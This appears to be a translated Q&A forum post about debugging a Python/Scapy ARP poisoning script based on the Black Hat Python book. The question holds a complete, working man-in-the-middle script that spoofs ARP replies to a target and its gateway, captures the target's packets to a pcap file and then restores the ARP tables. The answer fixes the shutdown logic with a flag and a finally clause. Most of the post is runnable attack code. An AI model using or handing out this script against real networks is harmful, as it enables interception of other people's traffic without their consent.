ArpPoisoning With Python , BlackHat 书

ArpPoisoning With Python , BlackHat Book

我试着写了一个基于 blackhat python 书的 arppoisoning 程序! 它工作正常,一切都很好,但是当我想用 ctrl+c 停止程序时,keybordinterrupt 异常不起作用! 我的恢复目标 运行 两次,因为它打印“[*] 恢复目标”显示了 2 次! 这是我的全部代码:

from scapy.all import *
import os
import sys
import threading
import signal


interface = raw_input("Enter Interface name :> ")
target_ip = "192.168.43.180"
gateway_ip = "192.168.43.1"
packet_count = 10

conf.iface = interface
conf.verb = 0

def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):
    print "[*] Restoring Target..."
    send(ARP(op=2,psrc=gateway_ip,pdst=target_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5)
    send(ARP(op=2,psrc=target_ip,pdst=gateway_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=5)
    os.kill(os.getpid(),signal.SIGINT)

def get_mac(ip_address):
    responses , unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)
    for s,r in responses :
        return r[Ether].src
    return None

def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):
    poison_target = ARP()
    poison_target.op = 2
    poison_target.psrc = gateway_ip
    poison_target.pdst = target_ip
    poison_target.hwdst = target_mac

    poison_gateway = ARP()
    poison_gateway.op = 2
    poison_gateway.psrc = target_ip
    poison_gateway.pdst = gateway_ip
    poison_gateway.hwdst = gateway_mac

    print "[*] Begining ARP Poisoning:"
    while True:
            send(poison_target)
            send(poison_gateway)
            time.sleep(2)

    print ".:ARP poison Attack Finished:."
    return


print ".: Setting Up %s :." % interface
gateway_mac = get_mac(gateway_ip)

if gateway_mac is None:
    print "Failed to Get Gateway MAC..."
    sys.exit(0)
else:
    print "[*] Gateway %s is at %s" %(gateway_ip,gateway_mac)
target_mac= get_mac(target_ip)

if target_mac is None:
    print "[!!!] Failed to get target MAC. Exiting."
    sys.exit(0)
else:
    print "[*] Target %s is at %s" % (target_ip,target_mac)

poison_thread = threading.Thread(target = poison_target,args=(gateway_ip,gateway_mac,target_ip,target_mac))
poison_thread.start()

try:
    print " \n[*] Start snifing for %d Packets \n" %packet_count
    bpf_filter = "ip host %s" % target_ip
    packets = sniff(count=packet_count,filter=bpf_filter,iface=interface)
    wrpcap('arper.pcap',packets)
    restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
except KeyboardInterrupt:
    restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
    sys.exit(0)

好的,我遇到了同样的问题。

问题出在 poison_target 函数中的 while True 循环:此循环永远不会退出。

查看可下载代码后,您会发现与本书中的代码存在一些细微差别。特别是,作者在主要错误处理中使用了 poisoning 全局和一个 finally 子句:

def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
    '''poison'''
    global poisoning
    --snip--
    print '[*] Begining the ARP poison. [CTRL-C to stop]'
    while poisoning:
        send(poison_t)
        send(poison_g)
        time.sleep(2)
    print '[*] ARP poison attack finished.'
    return

然后在主代码中:

--snip--
poisoning = True
poison_thread.start()
try:
    --snip--
    packets = sniff(count=count, filter=bpf_filter, iface=interface)
except KeyboardInterrupt:
    pass
finally:
    --snip--
    poisoning = False

    time.sleep(2)

    restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
    --snip--